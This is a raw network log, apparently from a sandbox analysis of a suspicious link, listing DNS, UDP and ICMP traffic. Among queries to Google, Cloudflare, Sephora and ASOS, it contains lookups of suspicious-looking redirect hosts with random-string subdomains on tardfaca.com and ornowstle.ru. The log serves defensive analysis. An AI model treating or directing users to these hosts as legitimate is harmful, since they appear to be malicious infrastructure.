                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.955128908 CEST6086253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.955343008 CEST5754853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.973609924 CEST5676553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.973701000 CEST5847053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.984514952 CEST5711653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.984703064 CEST5813153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.154895067 CEST5704853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.155002117 CEST5698453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.330599070 CEST6015153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.330703974 CEST6083653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.337986946 CEST53601511.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.338546038 CEST6415553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.338814974 CEST5311153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.339381933 CEST53608361.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.339907885 CEST5781953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.340150118 CEST5792853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.346276045 CEST53641551.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.349447966 CEST53579281.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.349623919 CEST53578191.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.370167017 CEST53531111.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.709742069 CEST6521753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.709868908 CEST5995153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.718058109 CEST53652171.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.719337940 CEST53599511.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:22.695276022 CEST4978853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:22.695656061 CEST5480153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:23.317823887 CEST6155053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:23.318038940 CEST5955553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:25.182882071 CEST53653631.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:28.774580956 CEST53612421.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.644922972 CEST5541453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.645070076 CEST6379553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.646534920 CEST5283053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.646672010 CEST6533053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.679537058 CEST53637951.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.363383055 CEST6166653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.363497019 CEST5215953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.369827032 CEST53525031.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.370522022 CEST53616661.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.370986938 CEST53521591.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.446861029 CEST6350853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.447227955 CEST5527353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.454389095 CEST53635081.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.455183983 CEST53552731.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.278955936 CEST5749153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.279140949 CEST5274053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.286612034 CEST53527401.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.286820889 CEST53574911.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.432733059 CEST6181553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.432889938 CEST5857553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.440104961 CEST53618151.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.442879915 CEST53585751.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.546878099 CEST6370953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.547070026 CEST5437953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.554148912 CEST53543791.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.554790020 CEST53637091.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.062391996 CEST5930753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.062530041 CEST6421753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.070013046 CEST53642171.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.070590973 CEST53593071.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.946675062 CEST5543353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.946808100 CEST5486153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.954269886 CEST53554331.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.955061913 CEST53548611.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:44.410024881 CEST6486453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:44.410644054 CEST5845453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:44.626444101 CEST53584541.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:44.626591921 CEST53648641.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:42.185866117 CEST192.168.2.161.1.1.1c231(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.502351046 CEST192.168.2.161.1.1.1c266(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:04.365362883 CEST192.168.2.161.1.1.1c28d(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:10.159522057 CEST192.168.2.161.1.1.1c2bf(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.568242073 CEST192.168.2.161.1.1.1c292(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.533787966 CEST192.168.2.161.1.1.1c28d(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.370259047 CEST192.168.2.161.1.1.1c2b8(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:40.387384892 CEST192.168.2.161.1.1.10x3a1eStandard query (0)www.google.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:40.387609959 CEST192.168.2.161.1.1.10x2e70Standard query (0)www.google.co.uk65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:42.132802010 CEST192.168.2.161.1.1.10x483aStandard query (0)we4uproducts.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:42.132949114 CEST192.168.2.161.1.1.10x1aa3Standard query (0)we4uproducts.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:43.063256025 CEST192.168.2.161.1.1.10x1193Standard query (0)fkmd.lioninkey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:43.063508034 CEST192.168.2.161.1.1.10x9ccfStandard query (0)fkmd.lioninkey.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:44.303805113 CEST192.168.2.161.1.1.10x90b3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:44.303932905 CEST192.168.2.161.1.1.10x6672Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.213140011 CEST192.168.2.161.1.1.10x2ca8Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.213272095 CEST192.168.2.161.1.1.10x8e7Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.213519096 CEST192.168.2.161.1.1.10xc080Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.213624954 CEST192.168.2.161.1.1.10x6725Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.213840961 CEST192.168.2.161.1.1.10xd5b3Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.213948011 CEST192.168.2.161.1.1.10xc2d7Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.358722925 CEST192.168.2.161.1.1.10x4930Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.358871937 CEST192.168.2.161.1.1.10xa15Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.648884058 CEST192.168.2.161.1.1.10xe02Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.649214029 CEST192.168.2.161.1.1.10xa65bStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.153181076 CEST192.168.2.161.1.1.10x7d72Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.153316975 CEST192.168.2.161.1.1.10x8ab1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.167284012 CEST192.168.2.161.1.1.10x6900Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.167437077 CEST192.168.2.161.1.1.10x9cd5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.701738119 CEST192.168.2.161.1.1.10xdc23Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.702024937 CEST192.168.2.161.1.1.10xe612Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:59.132613897 CEST192.168.2.161.1.1.10x487Standard query (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:59.132613897 CEST192.168.2.161.1.1.10x9856Standard query (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.284837961 CEST192.168.2.161.1.1.10x29bfStandard query (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.285228968 CEST192.168.2.161.1.1.10x3099Standard query (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.285655975 CEST192.168.2.161.1.1.10xce6cStandard query (0)www.sephora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.285926104 CEST192.168.2.161.1.1.10x27caStandard query (0)www.sephora.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.432260036 CEST192.168.2.161.1.1.10xc3acStandard query (0)cnstrc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.432626009 CEST192.168.2.161.1.1.10x8357Standard query (0)cnstrc.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.432960987 CEST192.168.2.161.1.1.10xec92Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.433131933 CEST192.168.2.161.1.1.10x5982Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.445019960 CEST192.168.2.161.1.1.10x8121Standard query (0)e309da9b9aaf.cdn4.forter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.445360899 CEST192.168.2.161.1.1.10x60b1Standard query (0)e309da9b9aaf.cdn4.forter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.469548941 CEST192.168.2.161.1.1.10xdf80Standard query (0)community.sephora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.469924927 CEST192.168.2.161.1.1.10xf612Standard query (0)community.sephora.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.477840900 CEST192.168.2.161.1.1.10x9df2Standard query (0)js-cdn.dynatrace.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.478149891 CEST192.168.2.161.1.1.10x8e3dStandard query (0)js-cdn.dynatrace.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.479799032 CEST192.168.2.161.1.1.10x1976Standard query (0)api.bluecore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.479993105 CEST192.168.2.161.1.1.10x69b8Standard query (0)api.bluecore.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.481089115 CEST192.168.2.161.1.1.10x444aStandard query (0)sephora-track.inside-graph.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.481278896 CEST192.168.2.161.1.1.10xa8a2Standard query (0)sephora-track.inside-graph.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.497390032 CEST192.168.2.161.1.1.10x1ce8Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.497586012 CEST192.168.2.161.1.1.10x9187Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.510952950 CEST192.168.2.161.1.1.10xf09dStandard query (0)sephora.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.511192083 CEST192.168.2.161.1.1.10x182bStandard query (0)sephora.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:03.890274048 CEST192.168.2.161.1.1.10xe19aStandard query (0)community.sephora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:03.890470982 CEST192.168.2.161.1.1.10xf73cStandard query (0)community.sephora.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:04.174212933 CEST192.168.2.161.1.1.10x37a7Standard query (0)www.sephora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:04.174340010 CEST192.168.2.161.1.1.10xe92eStandard query (0)www.sephora.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:07.376161098 CEST192.168.2.161.1.1.10x7602Standard query (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:07.376367092 CEST192.168.2.161.1.1.10x81f1Standard query (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:09.872514009 CEST192.168.2.161.1.1.10x6954Standard query (0)www.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:09.872720957 CEST192.168.2.161.1.1.10xd27dStandard query (0)www.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:09.873270035 CEST192.168.2.161.1.1.10x6cc2Standard query (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:09.873480082 CEST192.168.2.161.1.1.10x3150Standard query (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.154786110 CEST192.168.2.161.1.1.10x2e6aStandard query (0)content.asos-media.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.155157089 CEST192.168.2.161.1.1.10xd64cStandard query (0)content.asos-media.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.155651093 CEST192.168.2.161.1.1.10x43a9Standard query (0)images.asos-media.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.156050920 CEST192.168.2.161.1.1.10xf70Standard query (0)images.asos-media.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.156584024 CEST192.168.2.161.1.1.10xde77Standard query (0)www.asos-video.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.156733036 CEST192.168.2.161.1.1.10x9554Standard query (0)www.asos-video.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.165309906 CEST192.168.2.161.1.1.10x558eStandard query (0)assets.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.165592909 CEST192.168.2.161.1.1.10x7de3Standard query (0)assets.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.177300930 CEST192.168.2.161.1.1.10xae66Standard query (0)cdn.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.177453041 CEST192.168.2.161.1.1.10x379eStandard query (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.177798033 CEST192.168.2.161.1.1.10xdb0eStandard query (0)my.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.178034067 CEST192.168.2.161.1.1.10xeaebStandard query (0)my.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.179779053 CEST192.168.2.161.1.1.10xfa2fStandard query (0)ci.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.179968119 CEST192.168.2.161.1.1.10x992bStandard query (0)ci.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.191121101 CEST192.168.2.161.1.1.10xd6b9Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.191253901 CEST192.168.2.161.1.1.10xf590Standard query (0)res.cloudinary.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.294277906 CEST192.168.2.161.1.1.10x141eStandard query (0)assets.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.294439077 CEST192.168.2.161.1.1.10x73f6Standard query (0)assets.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.543582916 CEST192.168.2.161.1.1.10xd7d1Standard query (0)creativeassets.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.543762922 CEST192.168.2.161.1.1.10x2af5Standard query (0)creativeassets.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.770442963 CEST192.168.2.161.1.1.10x24e5Standard query (0)s2.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:12.770741940 CEST192.168.2.161.1.1.10x25d4Standard query (0)s2.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.514698029 CEST192.168.2.161.1.1.10xb62dStandard query (0)resources.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.514858007 CEST192.168.2.161.1.1.10xa7bbStandard query (0)resources.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.517489910 CEST192.168.2.161.1.1.10x782eStandard query (0)ci.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:13.517632961 CEST192.168.2.161.1.1.10x2f12Standard query (0)ci.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.098535061 CEST192.168.2.161.1.1.10x9af2Standard query (0)creativeassets.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.098695993 CEST192.168.2.161.1.1.10x3131Standard query (0)creativeassets.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.140451908 CEST192.168.2.161.1.1.10xe5c6Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.140626907 CEST192.168.2.161.1.1.10xa1fbStandard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.623886108 CEST192.168.2.161.1.1.10x3561Standard query (0)resources.asosservices.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.624155998 CEST192.168.2.161.1.1.10x4348Standard query (0)resources.asosservices.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.955128908 CEST192.168.2.161.1.1.10x5a83Standard query (0)www.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.955343008 CEST192.168.2.161.1.1.10xa4aStandard query (0)www.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.973609924 CEST192.168.2.161.1.1.10xba0Standard query (0)s2.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.973701000 CEST192.168.2.161.1.1.10x73e3Standard query (0)s2.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.984514952 CEST192.168.2.161.1.1.10x7d47Standard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:14.984703064 CEST192.168.2.161.1.1.10xfd4eStandard query (0)c.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.154895067 CEST192.168.2.161.1.1.10x20a7Standard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.155002117 CEST192.168.2.161.1.1.10x9ca1Standard query (0)c.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.330599070 CEST192.168.2.161.1.1.10x4cc3Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.330703974 CEST192.168.2.161.1.1.10x977bStandard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.338546038 CEST192.168.2.161.1.1.10x7e7Standard query (0)asos.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.338814974 CEST192.168.2.161.1.1.10x6f71Standard query (0)asos.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.339907885 CEST192.168.2.161.1.1.10xeb50Standard query (0)metrics.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:16.340150118 CEST192.168.2.161.1.1.10x6266Standard query (0)metrics.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.709742069 CEST192.168.2.161.1.1.10x8d3eStandard query (0)metrics.asos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:17.709868908 CEST192.168.2.161.1.1.10x5a4eStandard query (0)metrics.asos.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:22.695276022 CEST192.168.2.161.1.1.10x94cfStandard query (0)reporting.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:22.695656061 CEST192.168.2.161.1.1.10x1d86Standard query (0)reporting.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:23.317823887 CEST192.168.2.161.1.1.10xcf67Standard query (0)www.asosglobal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:23.318038940 CEST192.168.2.161.1.1.10x81fStandard query (0)www.asosglobal.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.644922972 CEST192.168.2.161.1.1.10x8b18Standard query (0)cm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.645070076 CEST192.168.2.161.1.1.10x35d0Standard query (0)cm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.646534920 CEST192.168.2.161.1.1.10xbd76Standard query (0)images.asos-media.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:32.646672010 CEST192.168.2.161.1.1.10x50cStandard query (0)images.asos-media.com65IN (0x0001)false
